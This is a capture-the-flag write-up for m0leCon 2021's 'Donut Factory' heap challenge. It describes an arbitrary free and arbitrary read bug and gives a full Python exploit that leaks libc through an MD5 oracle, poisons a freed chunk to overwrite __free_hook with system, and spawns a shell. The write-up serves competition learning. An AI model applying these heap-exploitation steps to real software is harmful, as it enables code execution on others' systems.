[Link to original writuep](https://wrecktheline.com/writeups/m0lecon-2021/#donut_writeup)

# Donut Factory (15 solves, 263 points)
by FeDEX

```
Come visit our factory to create your custom donuts!

nc challs.m0lecon.it 1743

Author: Alberto247
```

This challenge provided 2 files: `donut` binary and `libc-2.31.so`
A simple menu based challenge with the options to:
- Create donut
- Delete donut
- View donut
- Buy Donut
- Leave

Quickly reversing the program we can find unsanitized input for the `Delete` and `View` functionalities allowing us to perform the actions on arbitrary addresses.

The Delete method takes as input an address and frees it.
The View method takes as input an address and prints a donut based on the first byte.

Following this, I was able to generate all donuts and save their hash in a table and then proceed to leak the libc pointer from a freed heap chunk.

```python
hashes = ["244b8911aae2f329311f6d6511bb3c3c","9e12b4534de7339be7c1c550e42193f4","3517d5c190d9891461f855833686ce02","31f807fd73e342128428d0446620c3cb","e4140bf37897507a4baf6b5a679d9919","70dadc8a305d5594fe42a71785d5a97b","6c1f3bfceb82675c409eb3a9a173592f","27f3bee48c0f41f8fb494fcc8048e919","550fee47562795ebda1ea957e02bda0f","c7b22166c88a40eccfcf8732499e40d1","79a490bd8bc95a9e447f1af1f272f59a","0e793dd64dfb6eeaed878d9dcfa021e3","535e39e5e031961bacd91a1a3e7aaf38","74aecbca921511a0fef7b9db6767795d","df77b317a2ffd306893ca4395cfa2811","0f3c26437382ce2d5cbc253ecf912966","157461a3d1de9805c73b53c36c9d1925","a4bf483f8b958d05d78beadc80ea95a3","c1e90ac302441cdcef82528d318d298a","c59a0fdbec6e95ce8543fe2c0588b199","878f4d8961abb07585eec52242ac5054","1c3c336e76c9f6f4204239d7d68fc0c7","92b72832a439731509cb2b19c5063526","362ca530322fa159c7597a533372b3bc","8507b0c24546f5fc10ebecd26ab718b6","491a700da38fb98b6183e6c18d3296be","6b07a7b8416c7275c973158ddaa7357d","a14b87d441f3a7e52a647328d3a503d2","0a3910b8ac25ae8bbb6a03346b64f04c","9bf2dc4b520f698f5df821b6bdda0832","c36d65dc3f8cbdc199fcdbc78a6adff3","1dfafd64239861ec8976219bb0589351","756c4c95eef6cf127ca47d9c582ffee0","13e206ff982d36e82117d80b7a485aa9","2266c15194b98c647e243461abe42fe3","6ded8fdc2381cce1592f8d09a4a95c3d","b5487c60d1224434444bfd9236c709c7","e1ffb5c58845ffc368069f2a5b217bb5","b1875b40d0a3f4306f3f35203d4f6e47","f76a9c9f0d7acd77ceae43edc5162a5c","91717e87f382ec3643028b82da8c60c0","2fae081d73db99dc269da9bf1d9ecf01","4195d602e0c4b7c9940aaf9f72d3a73a","3b66601aee65402d5034a3b853e59aae","617196e86d4bcf9d7764f30f24734978","781609ffbae6bd53efba2f8bef9bf354","018e0f642cbd14fab3583b11d3503366","d06ad4593071eab0c7a64ffc62b74d61","8566c56cb71bbb4501b6d0f7c33ffcc7","336d9786cde6ea8995193084a1d9535f","2296a95a8d5ed3d6a4a2a5d44b9d8752","a5d41c4efc1668ccd6f13489ee0b6962","db8129e49e38831e955b51722a82e5e9","4dae69a5b462ac042c25bd36d6834c10","ab8ea2d6ab74277e057096ad221e1b1b","7a1b732c62c27e44d58aa5c8b94a89b8","e7776912cf2d73fe9c0ed71bace5468b","a08ba9655620bb8507da6439d64c8d43","a66e9a7140d86c5fb8ae912f432e298d","ee4e519a9c42a244621b16a02840d56f","9dd6f10f3ad48d0de2668e7b59818b7e","26a7195cff38401ec3a72b090bf50eaf","02fbe940ff64454bfd82de8a9b3626b9","61a65086a1da0342805f60b43ff0e03d","3f048d2ee699756f90530154808594ea","c3ad0b1059c7a0ed1254113b724591ad","522a994709b8fca96e5e981cabb655e5","aacd10c132ad192cfb94d3469dc35f24","f0d250a6a25cf33edbb19cc252899a19","408140dd3008b8da4b8378939a309f4a","0bc5c8454d5b3a1054df5d9c1ff38dc0","c91203b96d22b5cb3bdd3b27f0a1f111","e9e6233859c6f5b62532eb760e978178","0d82f46293df813946c1fd6bf159206c","ac448688a38d6f614366bb39cef03eef","93dc00ec08dfb66919f25671523fe612","47f21e690538237b94eeac2ca98ee0b7","088b6256948a64e0f1643be6b072b159","ea01cec409b620a60319291540f614d7","6d25b193f750efba5cd08b2769c0e3a7","4f6b299178369d1ee12b92d9e828bacf","61345b477c5597926af5e6bf36ce0e0a","52aef517cfc57a654ed230ca4c1362d7","c8c204a854409da700158526cae62435","e1cdd4d5caf77c6f3fec87214f5bb9dc","145c3c25998a15749519818bb89c135f","438b5dd73f94a5c5d0d0362ad4a66e6c","46f3a1705af1ebf4d9859b188684fd8a","0475d66adb47f2d47d76c3332b10b7c9","7cfcd6c4d5ad54026e9f537d38b9f59e","039b2e616cc311f44aadfa0c87160883","7cdef375044f36af43db571769536bdf","b1e1b4eead9587bbdff13bf15d197533","7bfb237b4b335c973f3bf7a6dd1cbd32","20dce478a13cec86b93d91a279053fba","33dd8cc72e018ff1c072aa44094b24ca","5ec3331b69725074c0c0774d64275e1f","e6e1729ff202433d82a9a79db3dfbac3","fb75b8d513aeba8a8f77d68f22f99815","b72b90a296d09822fda435208351d399","0186368abd0b3cd1971eb92b22dfa891","240d0624a58b37c76c1c30142ae20c20","1b6986d19e2920b8969eda71c0f06f23","6335c0e4d544e951618e0a2391615620","d882120924e914555016ee516ef8b1f6","5dd36739c264232ce517ef30c69e4020","d44d13f74c644c393daddc806b8effb6","0b347e6704a266e42c74463932e6887c","beec5ab4565cbe1f913a0653234bf996","6f4a0772195bcee71e6554e5e6d06178","256761ab9ec28964531955bad1689db0","8aa2a07a1b6b26dc492110b225e74fa0","cdfc4702005dd5ee08b8fba5400efef2","171582347945021b955f3d9f4bbc3d19","287ec05f16189f349e71e8f5739ff576","cab56c9f5311d74d1716958867abea24","8da48008d6411218ea86ed8d4b2ed3b6","08748849f4347c106f18af768eda9004","d329133ebcfedcc025fde1bf438e3d9f","61c5dd9b0ef3e9193a0b76d0605d8325","ca1bd76a428edc0571f6d4d025c0e5f1","e67f49d0be0c1ca3d15b75ad59dc5286","fba5d4915b188ca14ac29ec613899cdb","a299f56e65ddbadddda8b42d2b2358de","dc295a6371c3612cef283a27e116791d","d2d94c386c355e79016d0c34f7964048","eb6a00da275608fcc6e494bf14ed9a42","8003b4a3745233792a8a64f888b05281","1772180f1b6921354b1dfa2a9287260c","88473fd94b8e70ad46024b443e87e2fe","1b943cbe2b15cfe4fd866cd012912bd0","87e828501e6b82215d52da376fd9eb07","c44673531799a2de7b0344db39c4f1ae","feb0de99e0148fb89301457d8d6183dd","c3ae1a82c5fffb46653ade9aef3374cd","332370cce096416a199132f81c552604","d15a6f84d8176e910e145e9c94888dce","8e7178b0f0bbb42ccdcccfaddff5905e","d6e3c4db0a910736229919317e460925","9bdeea65860ab7ff1b7dba1b93446ccc","d1c82eff6118130af4adfb52963c5d1b","11d2601eab00b6462a39c43012846ab2","f177cef6b70774d36191cc2da5f48a76","3c439c9fd851c489d7e1527ede816560","de7d6a7ecd141bc6cba721b237d5fea4","90294a9ce3e7b02fbe2997e8ea378dff","d72e0b774f76bd6a3ddb823968d217c8","3d5ae0ef52e6f12e2378e83dd45c5b8f","9d72ce79bbaf8aef05d0350203b8da06","81be16218ee6c266773294a0d02d294e","addb2903ff8275d2bcd46ff8308b8e6b","645dbaeaa7dc933079a296bb8f66e083","f374e5a0b750056d00b89bb164970801","de10e4eb59b089d87598ce38f3c2fc9e","9d1bc9288c95a4ea889f437e61e79a15","543fc78ee3d8759c6eec584b7266faca","364d6362838a2b0de8e6482b2be88cc5","7d035f1bbc2f87fc1ccb9166d34f9a24","52eaa4aaed9202a8d4eeced5892af249","523d690bdf5e456e87f8c5a02c6ef0ce","8950b6981b82d6dda8aeb8d58adc9ada","0c5b179b055218ca10675b595b8d25aa","59c8e341cd9f3ebbd53182796506b442","fb04215e976e21486539fca63a559b64","a81861b0313a41d3084fd59da58b6ddf","2578adf8096e9054d7b248b8a8f361cf","33bd9ed361d6132fa027a613d8520bfc","c50bfa8726fd0c941fa49b5c99d2ea0d","154ca97762c31f6dce7aab2fd2dd4464","1c9a10afedd053493cd769d6d285506e","a3c47ecf4e1641a8db7bccb8e94e59c1","0129385b79426e13e24b750fb251b914","7e2daf44701c1356daf09c3fda75043b","e5846a457cc491683b53104df2021bf5","f8df3f2920d49cb3b86c3cb5cca04712","8f6362a7798ac335e5a725093abd06cc","e20d227b4ce6fcc76b8f0c76f6684bea","d7e3a97da001f59263643eb17d017cc8","be8a8dd440b697fac03061912c4021a8","22b001b903ba17c611ba4ed52477ca6b","db89bfdce129d88cf9e0cb7d9fc5c46f","e7769723f8fdbe76e2e1c48d7cddec5e","da3cf19ff1f5ca7fca088ab389b5cff0","0c2887a59682f19aab3012494db3484c","4edd35d8cde21b9695617b1f94076139","af55970f88c5e52a422aeb4b848a7087","77fa572655440cd82db5d42f9e30ca05","6e7a56bf66a07ac42b9a70df1cdac57b","c8652795213654feef519aedafab549c","0269d4b55b3ca1e8db252acf43db1b25","c8da711c93da6f0bd012a46e02c8a391","e00133726009504cbdb9d1697aaad05a","beebc3290e9050f4c8b405a673bb62d6","a1371bbc45894596125c34d9c8515036","ffc2fd64411bd8dc04496505e626bb29","4fe7b41fe37089cf722145b3ab53fd72","042b93b8286f628b5e8083765c4d4a1f","aa775b01118dd41e733ba2d3f3c4bd30","c3e5d248b0ac1c4f5063c4addfe56be9","ee7048a5e23dadd613a556da013dc9f9","88a8935ed4c82c20b1a0e6a02b94c432","7b24d486674fae9f9d182c134a61c4c0","a6af33e066c780b6710518306e2a8ddd","a00b87e316e14a41c8d7988b332ff954","904319188297d0dfed6533c65a4f20bc","44546db5a37f8666a5f5655965dc158a","afe67c388dd12a4943474784be62bf80","e71b8c06fef88758efbfaf0542c18f32","af35dc9ba30af53ab082be2cd763eb2f","87a6a01ec8948d48e7413e6c815e979e","49b44342c19f4d8c5ac214b82ca18d01","d8d8aea73fa72f2c98e7b3b0b5889b6b","4a442985c50d13c3b233b75c93de4595","8a51916019777fb7008318bb0221c6c8","8e53f8838d46fe4aa7e2a89a52f662db","85bb6f314c12f7d74bd62e03215b9153","f276a64fb37fc07c3eed642888332ccd","3d2619f673af2595277601d548059664","2cdfffa1cce47a0f1c103d98010775c3","15acbc1221bf58d5ad7571a8eb35d773","8a1392816509e0ebc42e5bd50792b6a8","73213ef32093bdd8867cbbf3ff4b5c43","24427f6f2e5e3aea08df2d5d04eb31e3","38a2dee8cae9d297855196b48521a774","e322e8836d30fcede0bc4599460570a0","f14b95c1bdd3cdb1f16cd4b03cae42c6","4e74b4d448035455b6da485e99b47a8b","5a889cd08e4bc55319a65aa9a7a75508","c4670d0417bca5fed0568452d4475f2d","99be610f21f7b712164c24d8732abd76","83376b59ba424dd3fb0456801961e107","668c1d8e62bc292ce1ef5b709ea8994f","ea6c08b34f228e10ad5157cd5b550fbe","73a6b98c64c9547fe077ba4d011dbccc","7a50f50ac2b1343aa74b2fcf26fb7a4b","e81b1e29982f3f8dab744b9de6ed3f07","75835b858eac15248772f39fc53eb34d","250bdeb6439df36461c0dd11629735f9","ef88c3e74d9b0e6b8ae895e16a15ba98","fbf35ddef33e6c567b81c6a77023e8d3","537ea975260d29ad418ef4184878d83d","60fe12c00a765af59fba90a2325dd694","aa9126aaa343a4703dd40521f2a4f919","56cb90f8d1c1cf2185c458b3915eaf77","6a9681d9d671b9e8e2b9279db93b9cc0","1826d982863eb441f0f944fff375d459","8d3c19a937665f89faf84f4d5dca8fc5","df95a4ad9a93d9fcb3c8cde5c21919b9","f8172e59c358e958e80ae6cdfaf98cd0","d1ddbe82b534adc606f2c7880bca473a","c6315d205043074b6e24c99678bb8606","db27f5b7975fc23bfb84c769d7da12f5","1ae3ecadf02d6c1ba26b15f92bad611d","8d887a9262277858be3c2cee9f7fc1df","48270138b22931afc183a62e1d77061f","a348d1e3cb8fc29f45650d8e6727d5b5"]

def leak_byte(ptr):
p.sendlineafter('factory\n', 'v')
p.sendlineafter('!', hex(ptr))
donut = p.recvuntil('We')
final_donut = donut.split(b'\x1B')[-1]
to_hash = final_donut[:-2] + b"Do"
hashed = hashlib.md5(to_hash).hexdigest()
return hashes.index(hashed)

def leakqword(ptr):
value = ''
for i in range(8):
tmp = leak_byte(ptr+i)
value += chr(tmp)

return value
```

Once I had the heap (was given by the program) and libc leak, I was ready to craft a fake chunk inside a big chunk, free it, corupt it's `fd` pointer, and then obtain a chunk over `free_hook`.
After that, upon freeing a chunk with `"/bin/sh"` a shell was triggered.

Exploit:
```python
if __name__ == "__main__":

################################## EXPLOIT

xx = create(1, 0x30, '/bin/sh\x00\x0a') # chunk used to trigger shell

d1 = create(1, 0x800, 'A'*10+'\x0a') # use to leak heap and libc
heap_base = int(d1,16)-0x16c0
print 'HEAP >>',hex(heap_base)

d2 = create(1, 20, 'A'*10+'\x0a') # avoid consolidation

print 'DESTROYING >>',d1
destroy(int(d1,16))

leak = leakqword(int(d1,16)) # leaking libc
leak = hex(u64(leak))

libc_base = int(leak,16)-0x1ebbe0
print 'LIBC >>',hex(libc_base)

d1 = create(1, 0x800, 'A'*10+'\x0a') # remove big chunk from unsorted

craftx = create(1, 0x68-2, 'ffff\n') # tmp chunk
craft1 = create(1, 0x200-2, '\x00'*7 + p64(0)*2 + p64(0x70) + '\n') # allocate chunk to hold fake chunk
print 'CRAFT >>', craft1
destroy(int(craftx,16)) # free tmp chunk
destroy(int(craft1,16)+0x20) # free fake chunk
destroy(int(craft1,16)) # free big chunk

craft = create(1, 0x200-2, 'X'*7 + p64(0)*2 +p64(0x70) + p64(int(libc_base)+0x1eeb28-8)*3 + '\n') # reallocate big chunk and corrupt fake chunk's fd

create(1, 0x68-2, 'Y'*0x18 + '\n')
create(1, 0x68-2, 'Z'*7 + p64(int(libc_base)+0x0000000000055410) + '\n') # get chunk over free_hook and overwrite with system

destroy(int(xx,16)+1) # trigger shell

p.interactive()
```

- flag: `ptm{N0w_th1s_1s_th3_r34l_s3rv3r!}`

Original writeup (https://wrecktheline.com/writeups/m0lecon-2021/#donut_writeup).